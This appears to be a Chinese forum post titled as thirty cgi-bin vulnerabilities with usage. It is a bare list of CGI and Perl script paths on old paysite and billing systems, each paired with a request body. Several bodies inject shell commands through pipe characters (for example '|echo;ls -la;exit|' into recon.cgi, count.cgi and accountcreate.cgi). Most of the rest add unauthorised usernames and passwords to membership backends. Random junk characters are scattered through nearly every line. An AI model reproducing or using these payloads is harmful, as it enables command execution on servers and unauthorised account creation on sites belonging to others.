Cgi-bin 30个漏洞＋使用方法

admin

==============================
: N- [- s/ g' ^+ [
2 @" \- k  U: D% ?) k5 Q) O/smspass.pl
$ M% R0 B1 d5 l7 X  R. z% cusername=username&password=password

$ s- R8 C2 Q$ D: ]: r( \/index.cgi
, u0 X, j7 `' K5 y% lwei=ren&gen=command
& L0 L. J6 o9 D5 [9 f
) T- T( |0 _. E7 L/passmaster.cgi
/ V- e" Y0 H& R1 rAction=Add&Username=Username&Password=Password

/accountcreate.cgi
, N; T( r' c( U( T: b; cusername=username&password=password&ref1=|echo;ls|
/ R) `8 j: @& \& V0 u, m7 Y, Z( U9 D
/form.cgi
9 R: U$ H. [2 w- e9 nname=xxxx&email=email&subject=xxxx&response=|echo;ls|
) W- W+ D! n9 {6 w
! x+ Q/ P5 F" ~* J: O' S/addusr.pl
, ^  I. e, A4 [! o4 t' A) _, U/cgi-bin/EuroDebit/addusr.pl
3 \; q( h$ b# N9 d# Fuser=username&pass=Password&confirm=Password
/ S' q2 k. m/ M6 C" d; l0 Z
/ccbill-local.asp
1 I$ Q/ U: P9 Y; |7 F: ppost_values=username:password

# v3 p0 i% y* m3 ~/count.cgi
+ V& c% Z+ G) S$ z: T9 ~pinfile=|echo;ls -la;exit|
$ `/ f" Y" d  {: M6 V
/recon.cgi
/recon.cgi?search
' Y: N8 E  a( E' p2 h+ }* Tsearchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
' I6 ?: T7 o$ S8 R" R, p% v  Vvercode=username:password:dseegsow:add:amount<&30>
2 y" G0 x9 b6 f( R
% ?. @8 r$ [$ a( d$ X/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30
  z. W! I; x+ ^
/openjournal.cgi
edit=1&ct=2&go=|echo;ls -al;exit|

, H4 W# s) T- ~! n/gx9passwd.cgi
# g7 \% N4 n/ D- Kcmd=ADD&user=username&pass=password

/probecontrol.cgi
+ U; Q2 o0 T/ E% zcommand=enable&username=username&password=password
* ^  v3 T: J4 k/ h/ _4 g
0 N9 A8 i' U" q4 a/recon.cgi
; ^# {7 Q) A- X9 N2 _# asearchoption=3&searchfor=echo;ls -la;exit
6 R7 d, g8 k: X! E- \/ r5 L  E
/htadd.pl
3 R5 x( j6 `7 ^configfile=|echo; ls -alt; exit

: G5 J+ k1 Z. F/gx9passwd.cgi
cmd=ADD&user=username&pass=password
; e9 i# a7 G2 V$ m& O6 s
' C- W0 d9 C, Z1 O; q4 ~/ibill*.pl
/ U1 N& i( q9 F3 j0 Greqtype=add&authpwd=authpwd&username=username&password=password

4 g& }7 i* m/ _) ?/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

  b( `$ a) [3 S' U/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

! s# `; V! \+ @) @' m# |/usercontrol.cgi
command=enable&username=USER&password=PASS

' W- ^7 ~, d( j+ B  g& f/globoSALErum.cgi
5 i" E9 X# K8 D0 ~! f3 C% kaction=ADD&seccode=seccode&login=username&password=password
' k3 T& i9 F) d, a; ]
/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
( k9 Y: F/ Z( N
( N2 M" P, _, F) g5 s- h/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
+ t# t8 X/ ?9 m8 Z: }" fusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

, y: ^: L+ g% n  C  M/af.cgi
/env.cgi
8 K  @/ {( F3 s, X4 KADD+;echo;pwd;exit

. q! c+ [: c# b6 n/count.cgi
, V6 ^7 v* L9 u$ p! K2 [/ Dpinfile=|echo;pwd;exit|
# E! v- b5 _4 F* {$ r
( F' A' _# n/ C: Q/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
* p' ^% s( N* u7 v8 F. w
$ s7 X# r9 d( F4 G/add.cgi
( f! d5 R# U( M* `1 |: Xusername=username&password=password&expire=30
+ ]. B) ^0 W- j4 P+ F
! T3 C8 f% Y/ w& O# u3 V==============================
% [& A2 U: _5 n# @- T